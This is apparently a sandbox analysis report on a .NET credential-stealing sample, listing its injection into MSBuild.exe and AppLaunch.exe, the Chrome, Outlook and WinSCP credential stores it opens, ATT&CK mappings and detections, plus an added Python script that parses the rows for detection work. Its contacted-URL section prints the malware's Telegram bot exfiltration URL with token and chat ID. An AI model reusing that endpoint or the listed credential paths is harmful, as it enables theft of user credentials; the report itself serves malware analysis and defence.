    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.logJump to behavior
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@1/1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';n
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;>Cannot add a PRIMARY KEY column4Cannot add a UNIQUE columntCannot add a REFERENCES column with non-NULL default valuehCannot add a NOT NULL column with default value NULLZCannot add a column with non-constant default
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' 4
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: hti.sLnagaugfe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: F*\AC:\Users\TSC\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp$
    Source: MSBuild.exe, 0000000E.00000002.531785304.000000000046C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: F*\AC:\Users\TSC\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeBinary or memory string: .vbpmva
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeBinary or memory string: mt]wXwA~ll.vbpmrv
    Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.csCryptographic APIs: 'CreateDecryptor'
    Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.csCryptographic APIs: 'CreateDecryptor'
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic file information: File size 2457088 > 1048576
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x247e00
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: ThunderFox.pdb source: AppLaunch.exe, 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, bgp.cs -- .Net Code: jmv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 16.0.AppLaunch.exe.4e00000.0.unpack, yX3qVQPc7HrPvyJ6nV/cZ6To4JeF1gFLqv7a4.cs -- .Net Code: TOsyUfqmE System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs -- .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Code function: 0_2_05484A0F push 5D669499h; ret
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Code function: 0_2_06337E12 push es; retf 3382h
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Code function: 0_2_06330540 pushad ; retf
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Code function: 0_2_063577AE push es; retf
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Code function: 16_2_051322D4 push E9000001h; retn 0009h
    Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs -- High entropy of concatenated method names: '.cctor', 'R8V6PVGwssOvC', 'P2HJOU7G4', 'wcvPOg3MI', 'FGeQZ6To4', 'cF1ggFLqv', 'wa4rNX3qV', 'ec7CHrPvy', 'c6n3VdfEB', 'BOgbswNYn'
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Process information set: NOOPENFILEERRORBOX (31 identical rows)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- Process information set: NOOPENFILEERRORBOX (12 identical rows)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Process information set: NOOPENFILEERRORBOX (25 identical rows)
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe TID: 2072 -- Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 3508 -- Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Thread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Thread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Code function: 16_2_05135D66 sldt word ptr [eax]
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Process information queried: ProcessInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Thread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Thread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- File opened: C:\Users\user\AppData\Roaming\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- File opened: C:\Users\user\AppData\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- File opened: C:\Users\user\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- File opened: C:\Users\user\AppData\Roaming\Microsoft\
    Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAWP
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Binary or memory string: lqEMUttqO=
    Source: MSBuild.exe, 0000000E.00000003.421672820.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Process token adjusted: Debug
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Code function: 16_2_05134520 LdrInitializeThunk,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46C000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46D000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BB2008
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4D01008
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000 protect: page execute and read and write
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000 value starts with: 4D5A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

    Stealing of Sensitive Information

    Source: Yara match -- File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
    Source: Yara match -- File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
    Source: Yara match -- File source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match -- File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: Yara match -- File source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match -- File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
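
    The evidence rows above tell one story when read together: the submitted executable writes an MZ header into MSBuild.exe, MSBuild.exe writes one into AppLaunch.exe, and it is AppLaunch.exe (a signed Microsoft .NET binary) that then opens the Outlook profile keys, the WinSCP session key and Chrome's Login Data. The following script is an added example, not Joe Sandbox code: it parses rows in the form they appear on this page (the source process and event name run together), rebuilds the injection chain from the "value starts with: 4D5A" writes, attributes each credential-store access to its injector lineage, and flags the sleep value 922337203685477, which is .NET TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks divided by 10000), i.e. an unbounded sleep. The credential-store labels and the event keyword list are this example's own assumptions.

```python
"""Added example (not Joe Sandbox code): parse this report's evidence rows, rebuild
the exe -> MSBuild.exe -> AppLaunch.exe injection chain and attribute the
credential-store access to the hollowed host process."""
import re
from collections import defaultdict

# Rows on this page run the source process and the event name together
# ("...exeProcess created: ..."), so split on the first known event keyword.
EVENT_RE = re.compile(
    r"^Source: (?P<src>.+?)(?P<kind>Process created|Memory written|Memory allocated|"
    r"Key opened|File opened|Thread delayed|Thread sleep time): ?(?P<detail>.*)$")

# Transcribed from the behaviour sections of this report.
REPORT_ROWS = r"""
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe TID: 2072Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
""".strip().splitlines()

# Credential stores this sample touched, keyed by a path fragment (assumed labels).
CREDENTIAL_STORES = (
    (r"Profiles\Outlook", "Outlook profile (mail credentials)"),
    (r"Martin Prikryl\WinSCP 2\Sessions", "WinSCP saved sessions"),
    (r"Chrome\User Data\Default\Login Data", "Chrome Login Data (saved passwords)"),
)
# .NET TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10000): the
# 922337203685477 in the report's "delay time" rows is an unbounded sleep.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000


def basename(path):
    """Image name only: drop the directory and any ' TID: nnnn' suffix."""
    return path.split(" TID:")[0].rsplit("\\", 1)[-1]


def parse_rows(rows):
    """(source image, event kind, detail) for every row the regex understands."""
    events = []
    for row in rows:
        m = EVENT_RE.match(row)
        if m:
            events.append((basename(m["src"]), m["kind"], m["detail"]))
    return events


def process_tree(events):
    """child image -> parent image; first creation wins (the report repeats rows)."""
    parents = {}
    for src, kind, detail in events:
        if kind == "Process created":
            parents.setdefault(basename(detail.split(" ", 1)[0]), src)
    return parents


def injection_chain(events):
    """(writer, target) for every write of an MZ header ('4D5A') into another process."""
    return [(src, basename(detail.split(" base:")[0]))
            for src, kind, detail in events
            if kind == "Memory written" and "value starts with: 4D5A" in detail]


def injector_lineage(events, proc):
    """Walk the MZ-header writes backwards: who put code into proc, and into them."""
    writers = {target: writer for writer, target in injection_chain(events)}
    chain = [proc]
    while chain[-1] in writers:
        chain.append(writers[chain[-1]])
    return chain


def credential_access(events):
    """image -> credential stores it opened (registry keys or files)."""
    hits = defaultdict(list)
    for src, kind, detail in events:
        if kind in ("Key opened", "File opened"):
            hits[src].extend(label for fragment, label in CREDENTIAL_STORES
                             if fragment.lower() in detail.lower())
    return {k: v for k, v in hits.items() if v}


def suspicious_sleeps(events):
    """Images that slept for TimeSpan.MaxValue or longer (sandbox stalling)."""
    out = []
    for src, kind, detail in events:
        if kind in ("Thread delayed", "Thread sleep time"):
            m = re.search(r"\d+", detail)
            if m and int(m.group()) >= TIMESPAN_MAX_MS:
                out.append(src)
    return out


if __name__ == "__main__":
    ev = parse_rows(REPORT_ROWS)
    print("process tree:", process_tree(ev))
    print("MZ writes   :", injection_chain(ev))
    for proc, stores in credential_access(ev).items():
        print(" <- ".join(injector_lineage(ev, proc)), "opened", stores)
    print("unbounded sleeps:", suspicious_sleeps(ev))
```

The practical point for detection engineering: a rule keyed on "AppLaunch.exe reads Chrome Login Data" catches this sample, but the durable signal is the parent/injector lineage: a .NET framework binary started by another .NET framework binary that was itself written into from a user-profile executable. The sleep check is cheap to add to any sandbox-report triage: a delay equal to TIMESPAN_MAX_MS is not a timer, it is a stall.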

    Remote Access Functionality

    Source: Yara match -- File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
    Source: Yara match -- File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
    Source: Yara match -- File source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match -- File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR

    Mitre Att&ck Matrix

    Listed per tactic column. A number in front of a technique is the report's signature-hit counter for that technique; techniques without a number are the matrix template and had no matching signature.

    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
    Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
    Privilege Escalation: 311 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
    Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 311 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 21 Software Packing
    Credential Access: 1 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
    Discovery: 1 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Remote System Discovery; 2 File and Directory Discovery; 12 System Information Discovery; Network Sniffing
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
    Command and Control: 1 Web Service; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
    Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample
    Source | Detection | Scanner | Label
    SecuriteInfo.com.W32.AIDetectNet.01.19566.exe | 26% | Virustotal |
    SecuriteInfo.com.W32.AIDetectNet.01.19566.exe | 100% | Avira | TR/Crypt.XPACK.Gen7
    SecuriteInfo.com.W32.AIDetectNet.01.19566.exe | 100% | Joe Sandbox ML |

    Dropped Files
    No Antivirus matches

    Unpacked PE Files
    Source | Detection | Scanner | Label
    14.0.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
    0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
    0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack | 100% | Avira | TR/Dropper.Gen
    0.0.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.f10000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
    16.0.AppLaunch.exe.4e00000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen
    0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
    0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack | 100% | Avira | TR/Dropper.Gen

    Domains
    Source | Detection | Scanner | Label
    dual-a-0001.a-msedge.net | 0% | Virustotal |
    windowsupdatebg.s.llnwi.net | 0% | Virustotal |

    URLs
    Source | Detection | Scanner | Label
    http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
    Contacted domains
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    dual-a-0001.a-msedge.net | 204.79.197.200 | true | false | | unknown
    api.telegram.org | 149.154.167.220 | true | false | | high
    windowsupdatebg.s.llnwi.net | 95.140.236.128 | true | false | | unknown

    Contacted URLs
    Name | Malicious | Antivirus Detection | Reputation
    https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\user | false | | high

